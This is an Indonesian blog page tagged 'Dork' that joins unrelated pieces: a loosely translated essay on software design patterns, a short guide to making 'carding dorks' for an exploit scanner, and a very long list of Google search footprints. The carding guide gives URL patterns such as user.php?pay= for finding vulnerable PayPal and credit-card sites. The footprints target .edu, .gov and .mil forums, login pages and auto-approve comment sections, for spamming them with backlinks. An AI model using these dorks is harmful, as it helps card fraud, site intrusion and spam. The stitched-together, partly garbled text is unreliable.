Halloween Costume ideas 2015

Software, Film dan Artikel Terbaru dan Terpopuler - Menyediakan Software terbaru dan juga pastinya Full Version, Film terbaru yang pasti HD, dan Artikel yang bermanfaat.

Articles by "Dork"

Halo Dunia! 
and hallo Family Programing T.I Sniper kami anak bangsa.!!

    Aku SourceMaking. Saya akan memberitahu Anda banyak cerita tentang arsitektur perangkat lunak yang baik dan mengajarkan cara untuk membuat dengan pola desain. Saya akan memandu Anda melalui anti-pola, perangkap umum dan kesalahan yang dilakukan orang ketika mereka berencana, membuat, dan mengelola proyek perangkat lunak. Pada akhirnya, saya akan mengajarkan Anda bagaimana untuk mencium kode buruk dan memperbaikinya dengan refactoring.

Kita bisa mulai dari awal atau Anda dapat memilih topik yang menarik di bawah ini.



Pola desain

   Dalam rekayasa perangkat lunak, pola desain adalah solusi berulang umum untuk masalah yang umum terjadi dalam desain perangkat lunak. Sebuah pola desain bukan desain jadi yang dapat diubah secara langsung ke kode. Ini adalah deskripsi atau template untuk bagaimana memecahkan masalah yang dapat digunakan dalam berbagai situasi.

Penggunaan Pola Desain

   Pola desain dapat mempercepat proses pembangunan dengan menyediakan diuji, paradigma pembangunan terbukti. Desain perangkat lunak yang efektif memerlukan mempertimbangkan isu-isu yang mungkin tidak menjadi terlihat sampai nanti dalam pelaksanaannya. Menggunakan kembali pola desain membantu untuk mencegah masalah halus yang dapat menyebabkan masalah besar dan meningkatkan pembacaan kode untuk coders dan arsitek akrab dengan pola.

Sering kali, orang hanya mengerti bagaimana menerapkan teknik desain software tertentu untuk masalah tertentu. Teknik ini sulit untuk diterapkan untuk lebih luas masalah. Pola desain memberikan solusi umum, didokumentasikan dalam format yang tidak memerlukan spesifik terkait dengan masalah tertentu.

Selain itu, pola memungkinkan pengembang untuk berkomunikasi menggunakan terkenal, nama dipahami dengan baik untuk interaksi perangkat lunak. Pola desain umum dapat ditingkatkan dari waktu ke waktu, membuat mereka lebih kuat dari desain ad-hoc.

Pola desain penciptaan

   Pola desain ini semua tentang kelas Instansiasi. Pola ini dapat dibagi lagi menjadi pola kelas penciptaan dan pola objek-penciptaan. Sementara pola kelas penciptaan menggunakan warisan efektif dalam proses Instansiasi, pola objek-penciptaan menggunakan delegasi efektif untuk mendapatkan pekerjaan yang dilakukan.

Contoh Abstrak Pabrik


Menciptakan sebuah instance dari beberapa keluarga kelas

Memisahkan konstruksi objek dari perwakilannya
Menciptakan sebuah instance dari beberapa kelas yang diturunkan

Hindari akuisisi mahal dan pelepasan sumber daya dengan daur ulang objek yang tidak lagi
digunakan
Sebuah contoh sepenuhnya diinisialisasi untuk disalin atau kloning

Sebuah kelas yang hanya satu contoh bisa eksis
Pola desain struktural
Pola desain ini semua tentang kelas dan komposisi Obyek. Pola kelas penciptaan struktur menggunakan warisan untuk menulis interface. Struktural objek-pola menentukan cara untuk menulis objek untuk mendapatkan fungsi baru.


Pola desain struktural




   Pola desain ini semua tentang kelas dan komposisi Obyek. Pola kelas penciptaan struktur menggunakan warisan untuk menulis interface. Struktural objek-pola menentukan cara untuk menulis objek untuk mendapatkan fungsi baru.

Interface pertandingan kelas yang berbeda

Memisahkan antarmuka obyek dari pelaksanaannya

Sebuah struktur pohon obyek sederhana dan komposit

Tambahkan tanggung jawab untuk objek dinamis

Sebuah kelas tunggal yang mewakili seluruh subsistem

Sebuah contoh halus digunakan untuk berbagi efisien

Membatasi accessor / akses mutator

Sebuah benda yang mewakili obyek lain



Pola desain perilaku




   Pola desain ini adalah semua tentang Class objek komunikasi. Pola perilaku adalah mereka pola yang paling khusus berkaitan dengan komunikasi antara objek

Cara melewati permintaan antara rantai benda

Merangkum permintaan perintah sebagai obyek

Sebuah cara untuk memasukkan unsur-unsur bahasa dalam sebuah program

Berurutan mengakses elemen koleksi

Mendefinisikan komunikasi disederhanakan antara kelas

Menangkap dan mengembalikan keadaan internal obyek

Dirancang untuk bertindak sebagai nilai default dari sebuah objek

Sebuah cara memberitahukan perubahan ke sejumlah kelas

Mengubah perilaku obyek ketika perubahan keadaan

Merangkum sebuah algoritma dalam kelas

Menunda langkah yang tepat dari sebuah algoritma untuk subclass

Mendefinisikan operasi baru untuk kelas tanpa perubahan






Kritik
Konsep pola desain telah dikritik oleh beberapa di bidang ilmu komputer.


Menargetkan masalah yang salah
   Kebutuhan pola hasil dari menggunakan bahasa komputer atau teknik dengan kemampuan abstraksi cukup. Di bawah anjak ideal, konsep tidak boleh disalin, tetapi hanya direferensikan. Tetapi jika ada sesuatu yang direferensikan bukan disalin, maka tidak ada "pola" untuk label dan katalog. Paul Graham menulis di Dendam esai dari Nerds.

Peter Norvig memberikan argumen yang sama. Dia menunjukkan bahwa 16 dari 23 pola dalam buku Pola Desain (yang terutama difokuskan pada C ++) disederhanakan atau dihilangkan (melalui dukungan bahasa langsung) dalam Lips atau Dylan.

Tidak memiliki dasar-dasar resmi   Studi tentang pola desain telah berlebihan ad hoc, dan bahkan ada yang berpendapat bahwa konsep tersebut sangat perlu dimasukkan pada pijakan yang lebih formal. Pada OOPSLA 1999, Gang of Four adalah (dengan kerja sama mereka penuh) mengalami percobaan menunjukkan, di mana mereka "dibebankan" dengan berbagai kejahatan terhadap ilmu komputer. Mereka "dihukum" oleh ⅔ dari "juri" yang menghadiri persidangan.

Mengarah ke solusi efisien
   Ide pola desain merupakan upaya untuk membakukan apa yang sudah diterima praktik terbaik. Dalam prinsip ini mungkin tampak menguntungkan, namun dalam prakteknya sering mengakibatkan duplikasi yang tidak perlu kode. Hal ini hampir selalu solusi yang lebih efisien untuk menggunakan implementasi baik-faktor daripada "cukup hanya nyaris baik" pola desain.

Tidak berbeda secara signifikan dari abstraksi lainnya

   Beberapa penulis menyatakan bahwa pola-pola desain tidak berbeda secara signifikan dari bentuk-bentuk abstraksi, dan bahwa penggunaan terminologi baru (dipinjam dari komunitas arsitektur) untuk menggambarkan fenomena yang ada dalam bidang pemrograman tidak diperlukan. Model-View-Controller paradigma yang disebut-sebut sebagai contoh dari "pola" yang mendahului konsep "pola desain" oleh beberapa tahun. Hal ini lebih jauh berpendapat oleh beberapa bahwa kontribusi utama dari masyarakat Pola Desain (dan Gang of Four buku) adalah penggunaan Alexander pola bahasa sebagai bentuk dokumentasi; praktek yang sering diabaikan dalam literatur.
Antipatterns: The Survival Guide
Baca selanjutnya
Artikel ini diambil dari Pola Desain buku kami Dijelaskan Cukup.


Semua pola desain dikompilasi ada. Buku ini ditulis dengan jelas, bahasa yang sederhana yang membuatnya mudah untuk membaca dan memahami (seperti artikel ini).





[-]Bahan - Bahan
-gr3enox exploit scanner.

[-]Cara mengembangkan dork carding

contoh dork
paypal : user.php?id=
CreditCard : user.php?pay=

Paypal :
user.php?id= < dork ini bisa dieditkan misal :
customer.php?id=

jika mau mengembangkan dork ganti saja customer < & id < nya
contoh : payment.php?aspx=
         payment.php?jsp=

Credit Card :
user.php?pay= < contoh dork credit card bisa dieditkan misal :
customer.php?pay=

mau ngembangin ?

tinggal ganti customer < & pay < nya

contoh :

amex.php?CategoryID=



Contoh Kembangan :
u.php?jsp=
u.php?aspx=
u.php?id=
u.php?pay=
u.php?cat=
u.php?search=
u.php?urlid=
u.php?car=

*NB : " Jika mau menambahkan site nya contoh :[ u.php?car=+site:uk  ]  .*

                                  


                                                                  - Selamat Berkreasi -









Pertama



sobat Silahkan menuju mesin pencari kesayangan Yakni google





Kedua

·Aktifkan dulu Seoquake browser anda,cara pasangnya baca dimari Cara Pasang | install | Menggunakan SEOquake

· Manfaatnya untuk mencari Situs yang PR 1 ke atas saja, karena PR 0 dan N/A kurang begitu mantap.

· Ketiga

· Berikut ini Kumpulan Google Dork untuk mencari backlin

· Silahkan Ketik Dork berikut ini disini silahkan Pilih :



Wikis EDU Footprints

Code:

· site:.edu inurl:wiki

· site:.edu inurl:MediaWiki_talk

· site:.,edu "Log in / create account"

· site:.edu wiki



EDU Blogs, GOV Blogs

Code:

Locate thousands of related blogs using these search strings.

· inurl:.gov+inurl:blog

· site:.edu inurl:wp-login.php +blog

· site:.gov inurl:wp-login.php +blog

· site:.edu inurl:”wp-admin” +login

· site:.edu inurl:blog “post a comment”

· site:.edu inurl:blog “post a comment” –“comments closed” -”you must be logged in” “keyword”

· site:.edu “no comments” +blogroll -”posting closed” -”you must be logged in” -”comments are closed”

· site:.gov “no comments” +blogroll -”posting closed” -”you must be logged in” -”comments are closed”

· inurl:(edu|gov) “no comments” +blogroll -”posting closed” -”you must be logged in” -”comments are closed”

· site:.edu inurl:blog “comment” -”you must be logged in” -”posting closed” -”comment closed”

· "keyword" blog site:.edu

· keyword +inurl:blog site:.edu

EDU Forums, Government Forums, Military sites

Code:

· site:edu inurl:login (Create an account)

· site:edu “powered by vbulletin”

· inurl:.edu/phpbb2

· inurl:.edu/ (Powered by Invision Power Board)

· site:edu “powered by SMF”

· edu forums sites,gov forums sites

· site:.mil

· site:edu inurl:login (Create an account)

· site:edu "powered by vbulletin"

· inurl:.edu/phpbb2

· inurl:.edu/ (Powered by Invision Power Board)

· site:edu "powered by SMF"

· "keyword" forum site:.edu

· "keyword" forum site:.gov

· "keyword" blog site:.gov

· inurl:.gov +inurl:forum + inurl:register

· inurl:.gov +inurl:forum

· inurl:.edu/phpbb inurl:register

· inurl:edu forum

· inurl:gov forum

· inurl:.edu+inurl:forum



PHPDug

Code:

· "Powered by PHPDug"

· "Powered By PHPDug"

· "Powered By PHPDug" inurl:signup

· "Powered By PHPDug" inurl:login

· "Powered By PHPDug" inurl:add_story

· inurl:signup "Powered By PHPDug"

· inurl:phpdug/signup

· inurl:signup "Powered By PHPDug"

· inurl:story.php?title=

· inurl:/upcoming/0/viewall/1.html

· "PHPDug version 2.0.0"

· "PHPDug version 1.4.2"

· "PHPDug version 1.4.1"

· "PHPDug version 1.4.0"

· "PHPDug version 1.3.1"

· "PHPDug version 1.3"

· "PHPDug version 1.2"

· "PHPDug version 1.1"

· "PHPDug version 1.0"

· "PHPDug Version 0.9.2"

· "PHPDug Version 0.9.1"

· "PHPDug Version 0.9.0"

· "PHPDug Version 0.8.1"

· "PHPDug Version 0.8.0"

· "PHPDug Version 0.7.0"

Pligg

Code:

· "http://www.pligg.com"

· "Powered by Pligg"

· "powered by pligg" Home Login "Register"

· allintitle:store share and tag your favorite links

· intitle:"Pligg Beta 9"

· intitle:"Pligg beta"

· intitle:"register"

· inanchor:"Pligg beta 9 Home"

· inanchor:"About Pligg"

· inurl:"Pligg beta"

· inurl:"register.php"++"powered by pligg"

· inurl:/register intext:"Powered by Pligg" -inurl:.php

· inurl:/register intext:"Powered by Pligg" -inurl:.php

· inurl:/register intext:"upcoming" intext:"published" intext:"submit" intext:"Tag Cloud" -inurl:.php

· inurl:/register intext:"upcoming" intext:"published" intext:"submit" -inurl:.php

· inurl:/register intext:"upcoming" intext:"published" intext:"submit" -inurl:.php intitle:"register"

· inurl:/register.php intext:"Powered by Pligg"

· inurl:register.php intext:"upcoming" intext:"published" intext:"submit"

· inurl:/register intext:"Powered by Pligg" -inurl:.php

· inurl:/register.php intext:"Powered by Pligg"

· inurl:register.php intext:"upcoming" intext:"published" intext:"submit"

· inurl:live_comments.php

· inurl:story.php inanchor:upcoming

· inurl:"pligg/upcoming.php"

· inurl:"register" intitle:"pligg"

· inurl:"cloud.php" intitle:"pligg"

· inurl:"live_comments" intitle:"pligg"

· inurl:"faq-en.php" intext:"pligg"

· inurl:"/pligg" inurl:/register.php

Elgg Footprints

Code:

· "Powered by Elgg" inurl:/account/forgotten_password.php

· "Latest bookmarks" "Powered by Elgg"

· intitle:New Elgg site

· "Example of information in the left hand pane" "Powered by Elgg"

· "Powered by Elgg + "Latest blog posts"

· "Powered by Elgg" inurl:account/register.php

· inurl:/go/browse/blogs

· inurl:register.php +"powered by elgg"

· inurl:forgotten_password.php "We will send the address of a unique verification page to you via email click"

· "powered by elgg"



Scuttle Footprints

Code:

· "Store all your favourite links in one place, accessible from anywhere"

· ?sort=alphabet_asc

· ?sort=popularity_asc

· Bookmarking the web 2.0

· intext:"bookmarks" "Store, share and tag your favourite links"

· intext:"date" "Store, share and tag your favourite links"

· intext:"first" "Store, share and tag your favourite links"

· intext:"next" "Store, share and tag your favourite links"

· intext:"Previous" "Store, share and tag your favourite links"

· intext:"register" "Store, share and tag your favourite links"

· intext:"Sort by:" "Store, share and tag your favourite links"

· intext:about "Store, share and tag your favourite links" about

· inurl:/populartags/

· inurl:?sort=url_asc

· inurl:?sort=url_asc AND "keyword"

· inurl:bookmarks.php scuttle

· inurl:by scuttlePLUS

· inurl:Populartags.php/ AND "keyword"

· inurl:scuttle/about.php

· inurl:scuttle/bookmarks.php

· inurl:scuttle/register

· inurl:scuttle/register.php

· Propulsed by SemanticScuttle

· Store, share and tag your favourite links

· "Speicher alle Deine Webseiten-Favoriten an einem Ort"

Referrer Footprints

Code:

· "usage statistics" "Summary Period: february 2009"

· "usage statistics" "Summary Period: march 2009"

· "Generated by Webalizer"

· inurl:awstats.pl intitle:statistics

· "Created by awstats"

· inurl:usage_200811 html

· "produced by wusage"

· "inurl:twatch/latest" html

· inurl:stats/REFERRER.html



Jisko Footprints

Code:

· "Powered by Jisko"

· "Have a look at the Frequently Asked Questions" "Powered by Jisko"

· Have a look at the Frequently Asked Questions Powered by Jisko

· "¿Problemas al iniciar sesión?" "Powered by Jisko" "Notas públicas" "Interfaz móvil"

· Problemas al iniciar sesión "Powered by Jisko" "Notas públicas" "Interfaz móvil"

· site:.com “Powered by Jisko” "frequently"

· inurl:/?module=faq "Jisko"

· inanchor:jisko Frequently Asked Questions

Captcha Footprints

Code:

· Please enter this code to enable your comment

· Type the characters you see in the picture above

· Web page addresses and e-mail addresses turn into links automatically

· Allowed HTML tags

· Lines and paragraphs break automatically

· Word verification by reCAPTCHA

· Can't read image

· you may use HTML tags for style

· play audio CAPTCHA

· Search Engines will index and follow ONLY links to allowed domains

· More information about formatting options

· Disable rich-text

· Some HTML allowed

· In order to control spam, please type the characters you see in the box below, then click 'Confirm Post' to continue with this post

· I agree to the Comments TOS

· Antispam question

· Up to 2 links allowed

· You may use these HTML tags and attributes

· By submitting a comment here you grant this site a perpetual license to

· Enter the above security code (required)

· Security Code:

· Type the letters that you see in the above image

· This site uses KeywordLuv

PhpFox

Code:

· "Powered by PhpFox"

· “phpfox” “yourkeyword” "Forum"

· inurl:phpfox

· "Powered By phpFox Version 2.0.4"

· "Powered By phpFox.v2.0.6"

· "Powered By phpFox Version 3"

· "Powered By phpFox Version 3.2.0"



Video Sharing Sites

Code:

· "Powered by MediaShare"

· "Powered by clipbucket"

· "Powered by VidiScript.com"

· "Powered by PHPMotion"

· "Powered by ClipShare"

· "Powered by iVidPlay"

· "Powered by iSoftScripts.com"

· "Powered by VShare"

· "Powered by Video CMS"

· "Powered by PHP Melody"

· "Powered by ClipBucket"

· "Powered by SkaDate" - online dating and social networking software combined

· "Powered by Sharemixer" - low cost video sharing solution a la Youtube

· "Powered by Clipshare"

· "Powered by SocialMedia.com"

Do-Follow Blogs

Code:

· Keywords “Powered by BlogEngine.NET”

· Keywords “top commenter”

· Keywords “Notify me of follow-up comments”

· Keywords “This site uses KeywordLuv”

· Keywords “Enable CommentLuv”

· Keywords “You can use these tags”

· “@Keyword(s) yourniche”

· “This site uses KeywordLuv yourniche”

· Top commenter Keyword(s)

· Top commenters Keyword(s)

· Top commentators Keyword(s)

· Top commentors Keyword(s)

· inurl:ucomment

· inurl:ifollow

· Keyword(s) "Recent Comments"

General Niche Directory

Code:

· “keyword” with your Niche keyword

· intitle:add+url “keyword”

· intitle:submit+your+site “keyword”

· intitle:add+your+site "keyword"

· "Suggest link" +"your keyword(s)"

· "Suggest a link" +"your keyword(s)"

· "Suggest site" + "your keyword(s)"

· "Suggest a site" + "your keyword(s)"

· "Suggest URL" +"your keyword(s)"

· "Suggest a URL" +"your keyword(s)"

· "Suggest an URL" +"your keyword(s)"

· "Add link" +"your keyword(s)"

· "Add a link" +"your keyword(s)"

· "Add site" +"your keyword(s)"

· "Add a site" +"your keyword(s)"

· "Add URL" +"your keyword(s)"

· "Add a URL" +"your keyword(s)"

· "Add an URL" +"your keyword(s)"

· "Submit link" +"your keyword(s)"

· "Submit a link" +"your keyword(s)"

· "Submit site" +"your keyword(s)"

· "Submit a site" +"your keyword(s)"

· "Submit URL" +"your keyword(s)"

· "Submit a URL" +"your keyword(s)"

· "Submit an URL" +"your keyword(s)"

· "favorite links" +"your keyword(s)"

· "recommended links" +"your keyword(s)"

· "cool sites" +"your keyword(s)"

· "cool places" +"your keyword(s)"

· reciprocal +"your keyword(s)"

· directory +"your keyword(s)"

· directorys +"your keyword(s)"

· directories +"your keyword(s)"

· exchange +"your keyword(s)"

· resources +"your keyword(s)"

· links +"your keyword(s)"

· "your location" +"add url"

· "your location" +"suggest a site"

· "your location" +"submit site"

· "your location" +links

· "your location" +"reciprocal links"

· "your location" +directory

Blog Footprints

Code:

· inurl:/add-blog.php

· inurl:/add_blog.php

· inurl:/addblog.html

· inurl:/addyourblog.asp

· inurl:/blog-submission.html

· inurl:/blog_submissions.html

· inurl:/submit-blog.html

· inurl:/submit_blog.html



RSS Feed

Code:

· inurl:/submitrssfeed.aspx

· inurl:/AddFeed.aspx

· inurl:/AddRSS.asp

· inurl:/Ping/

· inurl:/RSS_submission_form.asp

· inurl:/RSSform.asp?cat

· inurl:/Suggest-A-Feed

· inurl:/addFeed.do

· inurl:/add_feed.php

· inurl:/addfeed.html

· inurl:/addfeed.php

· inurl:/addfeed/

· inurl:/cgi_rss_submission

· inurl:/feedAdd.cfm

· inurl:/newfeed.php

· inurl:/ping.asp

· inurl:/ping.php

· inurl:/rss-add.html

· inurl:/rssform.asp

· inurl:/sub_rss.php

· inurl:/submit-feeds.html

· inurl:/submitFeed.jsp

· inurl:/submit_feed.php

· inurl:/submitfeed

· inurl:/submitfeed.shtml

· inurl:/submitnews.php

· inurl:/submitrss.php

· inurl:/suggest/feed

· inurl:/suggest_feeds.asp

· inurl:rss inurl:/submit.php

· inurl:submitFeed.aspx

· inurlL:/AddRSSFeed.jsp

General Forum

Code:

· Keyword(s) forum

· “Keyword(s) forum”

· “add comment”

· “post comment”

· Keyword(s) members

· Keyword(s) join

· Keyword(s) tag

· Keyword(s) group

· "your niche" forum

· "your niche" message board

· "your niche" bulletin board

phpBB 2

Code:

· inurl:"phpBB2/" site:com

· inurl:"phpBB2/" site:.net

· inurl:"phpBB2/" site:.org

· inurl:"phpBB2/" site:.info

· inurl:"phpBB2/" site:.biz

· inurl:"phpBB2/" site:.eu

· inurl:"phpBB2/" site:.us

· inurl:"phpBB2/" site:.ru

· inurl:"phpBB2/" site:.ua

· inurl:"phpBB2/" site:.jp



phpBB 3

Code:

· inurl:"phpBB3/" site:com

· inurl:"phpBB3/" site:.net

· inurl:"phpBB3/" site:.org

· inurl:"phpBB3/" site:.info

· inurl:"phpBB3/" site:.biz

· inurl:"phpBB3/" site:.eu

· inurl:"phpBB3/" site:.us

· inurl:"phpBB3/" site:.ru

· inurl:"phpBB3/" site:.ua

· inurl:"phpBB3/" site:.jp

Guest Post Footprints

Code:

· “Submit a guest post” / “Submit post” / “Submit blog post”

· “Add blog post”

· “Submit an article”

· “Suggest a guest post”

· “Send a guest post”

· "Send your post"

· "Bloggers Wanted”

· "Guest Post”

· "Guest Blogging Spot”

· "Submit a Guest Post”

· "Become a Guest Blogger”

· "Guest Post Guidelines”

· "Want to Write for”

· "Blogs that Accept Guest Blogging”

· "Blogs Accepting Guest Posts”

· "Contribute”

· "Submit News”

· "Submit Tutorial”

· "Suggest a Post”

· "Become an Author”

· "Become a Contributor”

· "Places I Guest Posted”

· "Publish Your News”

· "Guest post by”

· "Guest Contributor”

· "This is a guest article”

· "Add Articles”

· “Add Guest Post”

· “Guest Bloggers Wanted”

· “Guest Posts Roundup”

· “Write for Us”

· “Submit Guest Post”

· “Submit a Guest Article”

· “Guest Bloggers Wanted”

· “Group Writing Project”

· “Blogs that Accept Guest Posts”

· “Blogs that Accept Guest Bloggers”

· “Become a Contributor”

· “Submit Design News”

· “Community News”

· “Submit Blog Post”

· “Suggest a Guest Post”

· “Contribute to our Site”

· “Become a Guest Writer”

· “My Guest Posts”

· “Submission Guidelines”

· “This guest post was written”

· “This guest post is from”

· “Now Accepting Guest Posts”

· “The following guest post”

· inurl:guest-post-guidelines

· inurl:guest-posts

· inurl:write-for-us

· inurlprofiles/blog/new

General Directory

Code:

· "favorite links" Keyword(s)

· "favorite links"

· "favorite sites" Keyword(s)

· "favorite sites"

· "Keyword(s) sites"

· "Keyword(s) website"

· "Keyword(s)"

· "list * Keyword(s) * sites"

· "list * Keyword(s)"

· "list of Keyword(s) sites"

· "list of Keyword(s)"

· "recommended links" Keyword(s)

· "recommended links"

· "recommended sites" Keyword(s)

· "recommended sites"

· directory * Keyword(s)

· intitle:directory "Keyword(s)"

· inurl:directory "Keyword(s)"

· Keyword(s)

· Keyword(s) * directory

· Keyword(s) catalog

· Keyword(s) directory

· Keyword(s) sites

· Keyword(s) websites |Keyword(s)

· Keyword(s) websites



General Footprints

Code:

· “add url”

· “add site”

· “add website”

· “add your site”

· “add a url”

· “add * url”

· “add * site”

· “add * website*

· “submit url”

· “submit site”

· “submit website”

· “submit your site”

· “submit a url”

· “submit * url”

· “submit * site”

· “submit * website”

· “suggest url”

· “suggest site”

· “suggest website”

· “suggest your site”

· “suggest a url”

· “suggest * url”

· “suggest * site”

· “suggest * website”



Auto Approve

Code:

· "*Keyword says:" +"October 12th, 2012"

· Submitted by Anonymous (not verified)

· Submitted by Anonymous (not verified) on Fri, 10/12/2012

· "October 12th, 2012" + "leave a reply" + "*%kw% says" + "Mail (will not be published) (required)" + "Website"

· site:.edu "* %kw% says" "leave a reply"

· site:.edu "%kw% * says" "leave a reply"

· "powered by wordpress"

· inurl:blog

· inurl:node



SEO-Board Footprints

Code:

· "powered by SEO-Board"



Phorum Footprints

Code:

· "powered by Phorum"

· "powered by phorum" inurl:register

· inurl:phorum inurl:register

· inurl:/phorum/register.php



MesDiscussions Footprints

Code:

· “MesDiscussions”



MiniBB Footprints

Code:

· “powered by minibb”

MyBB Footprints

Code:

· “Powered By MyBB”



IceBB Footprints

Code:

· “powered by icebb”



Fruit Show Footprints

Code:

· “Powered by FruitShow”



Invision Power Board Footprints

Code:

· “Powered by Invision Power Board”

· “Powered by Invision Power Board(U) v1.3 Final”

· intext:“Powered by Invision Power Board” inurl:action=register

· intext:“Powered by Invision Power Board” inurl:register

· intext:“Powered by Invision Power Board” inurl:/users/register

· "Powered By IP.Board 2.3.3"

· “Powered By IP.Board 2.3.5”

· “Powered By IP.Board 2.3.6”



vBulletin Forum Footprints

Code:

· "In order to proceed, you must agree with the following rules"

· "Powered by vBulletin"

· “Powered by vBulletin * 3.0.0”

· “Powered by vBulletin * 3.0.1”

· “Powered by vBulletin * 3.0.4”

· “Powered by vBulletin * 3.0.5”

· “Powered by vBulletin * 3.0.6”

· “Powered by vBulletin * 3.0.7”

inurl:newreply.php

· "Powered by vBulletin" inurl:register.php



Simple Machines Forum (SMF) Footprints

Code:

· "powered by SMF"

· "powered by Simple Machines"

· inurl:/index.php?action=register

· "powered by Simple Machines" inurl:/index.php?action=register



Web 2.0 Footprint

Code:

· "powered by wordpress"

· "powered by blogger"

· "powered by tumblr"

· "Create a free website with weebly"

· "Powered By Elgg"

· intitle:"powered by jcow"

· We won't display your email address

· Forums Signatures Footprints

· Code:

· inurl:.edu "Find all posts by""Find all threads started by""Total Posts: 0" "signature"

· nurl:.gov "Find all posts by""Find all threads started by""Total Posts: 0" "signature"

· "powered by phpbb" "Total Posts: 0" "signature"

· "powered by vbulletin" "Find all posts by""Find all threads started by""Total Posts: 0" "signature"



CommentLuv Blog Footprints

Code:

· Keyword(s) “Enable CommentLuv”



Top Comments Blog Footprints

Code:

· Keyword(s) “Top Commenter”

· Keyword(s) “Top Commenters”

· +"top+commenters"+"powered+by+wordpress" Keyword

· “Top Commenters” or “Top Commenter”

· “Top Commenters” or “Top Commenter” +inurl:201.

· “Top Commenters” or “Top Commenter” +inurl:2012



Squidoo comments Footprints

Code:

· site:squidoo.com "add to this list"

· site:www.squidoo.com "Squidoo : Tags" KEYWORD



HubPages comments Footprints

Code:

· site:HubPages.com KEYWORD "Hot Hubs"



XOOPS Footprints

Code:

· inurl:userinfo.php?uid

· “powered by xoops”

· "Receive occasional email notices from administrators and moderators?"



BoonEx Footprints

Code:

· "Powered by Dolphin - Free Community Software"

CBOX Footprints

Code:

· "help · smilies · cbox"

· allintext:[get a cbox]

· smartgb.com Footprints

· Code:

· "Get your own free guestbook from smartgb.com"

Revou Footprints

Code:

· "Powered By ReVou Software"

· "groups" "Most popular" "All Groups" "Forgot your password?" "Powered By" "ReVou Software"

· "groups" "Most popular" "All Groups" "Forgot your password?" "Powered By"

· intitle:"what are you doing" "groups" "Most popular" "All Groups" "Forgot your password?" "Powered By" "revou"

· intitle:"what are you doing" "revou"

StatusNet Footprints

Code:

· "Powered by StatusNet"

· "1-64 lowercase letters or numbers, no punctuation or spaces. Required."

· "is a microblogging service brought to you by Status.net. It runs the StatusNet microblogging software, version"

INDEXU Footprints

Code:

· inurl:suggest_category.php

· inurl:top_rated.php

· "INDEXU 5.4.0"

Webmini Footprints

Code:

· inurl:p/0/asc

· inurl:a/0/asc

· Hurricane Footprints

· Code:

· Powered by Katalog Stron Hurricane V

FreeGlobes Footprints

Code:

· inurl:allcats.html

SEOKatalog Footprints

Code:

· "Powered by SEOKatalog"

Ning Footprints

Code:

· inurl:ning.com

· "social network platform"

· intext:http://www.ning.com/

· “Powered by Ning”

· “We use Ning ID for authentication.”

· “What is a Ning ID?”

· inurl: /main/authorization/signIn

· inurl: /main/authorization/signUp

Insoshi Footprints

Code:

· "powered by insoshi"

· Powered_by_insoshi_lightbg

· inurl:/password_reminders/new

· “Join Insoshi”

Link Building

Code:

· keyword sponsors

· keyword sponsorship

· keyword sponsor charity

· keyword benefactors

· keyword donate

· keyword donations

· keyword donors

· keyword "add url" / "add * url"

· keyword "add site" / "add * site"

· keyword "add website" / "add *website"

· keyword "submit url" / "submit * url"

· keyword "submit site" / "submit *site"

· keyword "submit website" / "submit * website"

· keyword "suggest url" / "suggest * url"

· keyword "suggest site" / "suggest site"

· keyword "suggest website" / "suggest * website"

· keyword "recommended links"

· keyword "recommended sites"

· keyword "recommended resources "

· keyword "favorite links"

· keyword "favorite sites"

· keyword bookmarks

· keyword resources

· "list * keyword * sites"

· "add comment" keyword / "add * comment"

· "post comment" keyword / "post * comment"

· keyword "leave a comment" / "leave * comment"

· keyword "no comments"

· keyword "notify me of follow-up comments"

· keyword "wiki" (site:.edu)

· keyword forum / keyword forums

· keyword discussion boards

· keyword members

· keyword join

· keyword "advertiser testimonials"

· keyword "related URLs" / "* related URLs"

· keyword "related sites" / "* related sites"

· "your location" +"add url"

· "your location" +"submit site"

· "your location" +"suggest a site"

· "your location" +directory

Question and Answers Footprints 1

Code:

· "All Shapado.com content and data are available under the Creative Commons Attribution 3.0 license"

· "Answer Questions or Ask a Question" -site:qhub.com +"KW"

· "©2012 Answers All right reserved"+"by WP-Answers." -site:wp-answers.com +intitle:"KW"

· +"powered by Answerbase" +"KW"

· +"powered by OSQA" +site:*/questions/ +"KW"

· "Powered by Question2Answer" +"asked * ago by" -site:question2answer.org +"KW"

· site:shapado.com/questions/ +"KW"

· Data Modelers QA is a community service provided by Datanamic.

· "Snow Theme by Q2A Market"

· "Theme Designed By: Pixel n Grain"

· "To see more, click for the full list of questions or popular tags."

· "Recent questions and answers" Question2Answer

· "Designed by Axiologic SaaS" Question2Answer

· "powered by ASKBOT"

· "Search tip: add tags and a query to focus your search"

· "Content on this site is licensed under a Creative Commons Attribution Share Alike 3.0 license." askbot

· "Hi, there! Please sign in" askbot

· "Powered by Qhub.com"

· "Answer Questions or Ask a Question"

· "Ask a question Provide Feedback"

· "Badges Explained" "Asked a question"

· "questions tags users badges unanswered" "ask a question"

· "You are welcome to start submitting your question anonymously."

Question and Answers Footprints 2

Code:

· "powered by OSQA"

· "Powered by Question2Answer"

· "Powered by Shapado"

· "Powered by Shapado 4.1.0"

· "Answers Theme by Premium Wordpress Themes"

· "Powered by Qwench"

· "Question Answer Script"

· "Instant Q&A"

· "Question & Answers Wordpress Plugin by WP-Answers"

· "Question & Answers Wordpress Plugin"

· "by WP-Answers"

· "AnswerScript.com"

· "Powered by Agriya.com"

· "Anova does not evaluate or guarantee the accuracy of any Anova content"

· "Powered By AlstraSoft AskMe Pro"

· "ExactAsking.com"

· "All images are property of ExactAsking.com and Exact, Inc"

· "©2010 ExactAsking.com"

· "Powered by Askbot version 0.7.43"

· "Powered by Askbot"

· "Answer Question Script | Powered by AnswerQuestionScript.com"

· "Answer Question Script"

· "Powered by AnswerQuestionScript.com"

· "Powered by LampCMS"

· "Famous Questions CMS v1.01"

· "by FamousWhy"

· "Famous Questions CMS v1.01 by FamousWhy"

· "Famous Questions CMS"

· "powered by cahoots2"

· "concentrated technology"

· "powered by solace"

iral Socializer Script Footprints

Code:

· “Add and share your bookmarks with the ease of a click”

· “I agree Terms of servises”

· “Export & Import favorites”

· "Discover the popular tags"

Unclassified NewsBoard Footprints

Code:

· "Powered by the Unclassified NewsBoard"

· intext:"Powered by the Unclassified NewsBoard" inurl:req=register

LifeType Footprints

Code:

· "Powered by LifeType" inurl:?op=Register -Sorry -disabled -??? -neuer -disabilitato -suspendus -????????

· "Powered by LifeType"

KickApps platform Footprints

Code:

· "You can join by using one of our existing provider accounts: "

· “Social Media Platform by KickApps”

· “Powered by KickApps”

· inurl:user/displayUserRegisterPage.kickAction

· Social Web CMS (SWCMS) Footprints

· [code"powered by socialwebcms"

· "powered by SWCMS"

· [/code]

